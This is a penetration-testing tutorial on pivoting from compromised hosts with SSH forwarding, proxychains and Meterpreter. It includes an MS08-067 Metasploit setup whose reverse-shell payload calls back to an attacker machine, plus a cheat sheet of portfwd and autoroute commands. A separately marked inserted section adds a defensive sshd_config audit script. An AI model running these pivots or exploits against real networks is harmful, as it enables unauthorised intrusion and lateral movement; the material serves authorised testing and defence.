Pivoting on a Penetration Test

What is Pivoting?

Pivoting allows a security consultant to use a host compromised during a pen testing engagement to route traffic to other hosts or subnets, giving the tester access to machines that were previously unreachable. Typically, a foothold is established on a target network by successfully exploiting an externally facing machine during a penetration test, or through a successful phishing / spear-phishing campaign.

This article focuses specifically on pivoting from compromised Linux hosts using SSH port forwarding and Meterpreter pivoting; however, the Meterpreter techniques also apply to Windows targets.

SSH Pivoting on Pen Tests

SSH port forwarding is a reliable method of pivoting from Linux hosts, the drawback being that a new port forwarding rule needs to be created for each port you wish to reach on the target. For example, if you discover a host has SMB and RDP exposed, you would need to create an SSH port forwarding rule (see example below) for both port 445 and port 3389. Because of this limitation it is often preferable either to scan from the compromised machine itself (using a single binary you can remove once testing has completed) or to use dynamic proxychains forwarding (see example below) for the initial nmap scan to see what is exposed. Although setting up SSH port forwarding is additional effort, the extra work is worth it as it gives you a stable connection while testing.

USER and PIVOT-HOST below are placeholders for your login name and the compromised host.

Command                                       Description
-------                                       -----------
ssh -L 9999:10.0.2.2:445 USER@192.168.2.250   SSH port forwarding. Local port 9999 is forwarded to port 445 on 10.0.2.2 through host 192.168.2.250.
ssh -D 127.0.0.1:9050 USER@PIVOT-HOST         Dynamic forwarding for use with proxychains. Local port 9050 becomes a SOCKS proxy through which any port on the subnets available to the target can be reached.
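As an added defender's-side example that is not part of the original article, the following POSIX shell script audits an sshd_config for the directives that decide whether an SSH login on a host can be turned into the -L / -D pivot described above. The two sample configs, the function names and the assumption that the file contains no Match blocks are mine; the built-in defaults it falls back to are OpenSSH's own (AllowTcpForwarding yes, PermitTunnel no, GatewayPorts no), and OpenSSH honours the first occurrence of a directive, which the audit mirrors.

```shell
#!/bin/sh
# Added example, not from the original article: audit an sshd_config for the
# directives that decide whether a login on this host can be used as an SSH
# pivot (ssh -L / ssh -D). OpenSSH uses the FIRST value it finds for a
# directive and a built-in default when the directive is absent; both are
# mirrored here. Assumption: no Match blocks (those need per-user evaluation).

# Constructed sample: a typical default install. AllowTcpForwarding is only
# commented out, so OpenSSH's default of "yes" applies and -L/-D forwards work.
SSHD_CONFIG_WEAK='Port 22
PermitRootLogin no
#AllowTcpForwarding no
GatewayPorts no'

# Constructed sample: hardened so the host cannot be used as a pivot.
SSHD_CONFIG_HARDENED='Port 22
PermitRootLogin no
AllowTcpForwarding no
PermitTunnel no
GatewayPorts no
AllowAgentForwarding no'

# sshd_effective DIRECTIVE DEFAULT   (config on stdin)
# Prints the effective value: the first uncommented match, else DEFAULT.
sshd_effective() {
    directive=$1; default=$2
    value=$(sed 's/#.*//' | awk -v d="$directive" '
        tolower($1) == tolower(d) { print tolower($2); exit }')
    printf '%s\n' "${value:-$default}"
}

# pivot_risk   (config on stdin)
# Prints "forwarding-allowed" when an authenticated user could create local or
# dynamic TCP forwards or a tun device, otherwise "forwarding-blocked".
pivot_risk() {
    cfg=$(cat)
    tcp=$(printf '%s\n' "$cfg" | sshd_effective AllowTcpForwarding yes)
    tun=$(printf '%s\n' "$cfg" | sshd_effective PermitTunnel no)
    # yes|all|local permit -L and -D; "remote" permits only -R (reverse) forwards.
    case "$tcp" in
        yes|all|local) echo forwarding-allowed; return 0 ;;
    esac
    if [ "$tun" != no ]; then
        echo forwarding-allowed; return 0
    fi
    echo forwarding-blocked
}

# audit_report LABEL   (config on stdin): one summary line for the operator.
audit_report() {
    label=$1
    cfg=$(cat)
    printf '%-9s AllowTcpForwarding=%s PermitTunnel=%s GatewayPorts=%s -> %s\n' \
        "$label" \
        "$(printf '%s\n' "$cfg" | sshd_effective AllowTcpForwarding yes)" \
        "$(printf '%s\n' "$cfg" | sshd_effective PermitTunnel no)" \
        "$(printf '%s\n' "$cfg" | sshd_effective GatewayPorts no)" \
        "$(printf '%s\n' "$cfg" | pivot_risk)"
}

printf '%s\n' "$SSHD_CONFIG_WEAK"     | audit_report weak
printf '%s\n' "$SSHD_CONFIG_HARDENED" | audit_report hardened
```

Against a real host run `pivot_risk < /etc/ssh/sshd_config`. A machine that must stay reachable over SSH but should never act as a pivot gets AllowTcpForwarding no and PermitTunnel no; where a handful of forwards are genuinely needed, PermitOpen can whitelist just those destinations instead.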

Note on Proxychain port forwards

Dynamic SSH Proxychain forwarding does not work with meterpreter shells.

If you attempt to spawn a shell via Meterpreter, you'll get an error similar to the following:

meterpreter > execute -f cmd.exe -i -H
|S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:41713-<--timeout

How to use Proxychain port forwards

All commands must be prefixed with proxychains in order to route traffic correctly.

Example connecting to RDP over Proxychains

proxychains rdesktop TARGET-ADDRESS

Metasploit SSH Pivoting Example

The following example assumes you have set up the SSH port forward using the instructions above, so that local port 9999 is forwarded to port 445 on the target. The Metasploit module for MS08_067 is used here to demonstrate how SSH pivoting can be used from within Metasploit itself: note that RPORT is set to the local forwarded port, 9999, rather than to 445.

Attacking Machine: 192.168.3.99

msf exploit(ms08_067_netapi) > show options

 Module options (exploit/windows/smb/ms08_067_netapi):

    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST    0.0.0.0          yes       The target address
    RPORT    9999             yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


 Payload options (windows/meterpreter/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
    LHOST     192.168.3.99     yes       The listen address
    LPORT     443              yes       The listen port

 Exploit target:

    Id  Name
    --  ----
    0   Automatic Targeting

Meterpreter Pivoting Cheat Sheet

If you have successfully compromised a host during a penetration test, it is possible to use a Meterpreter shell to pivot to other hosts on the network. Meterpreter can pivot from both compromised Windows and Linux targets; however, it is typically far less reliable than SSH port forwarding, as Meterpreter sessions are more prone to timing out, which kills the connection.

Command                                        Description
-------                                        -----------
portfwd add -l 3389 -p 3389 -r target-host     Forwards local port 3389 to port 3389 (RDP) on target-host, via the compromised machine running the Meterpreter shell.
portfwd delete -l 3389 -p 3389 -r target-host  Deletes the port forward created above.
portfwd flush                                  Delete all port forwards.
portfwd list                                   List active port forwards.
run autoroute -s 192.168.15.0/24               Run the Autoroute script to automatically add rules to route traffic for the subnet 192.168.15.0/24 through the compromised host.
run autoroute -p                               List all active routes for the current Meterpreter session.
route                                          View available networks the compromised host can access.
route add 192.168.14.0 255.255.255.0 3         Add a route for 192.168.14.0/24 via Session 3.
route delete 192.168.14.0 255.255.255.0 3      Delete the route for 192.168.14.0/24 via Session 3.
route flush                                    Delete all Meterpreter routes.

How to Connect to targets using Meterpreter Port Forwards

The port is forwarded locally to the target. Using RDP as an example, and assuming you have set up a Meterpreter port forward using the same port locally and remotely, you would connect with:

rdesktop 127.0.0.1
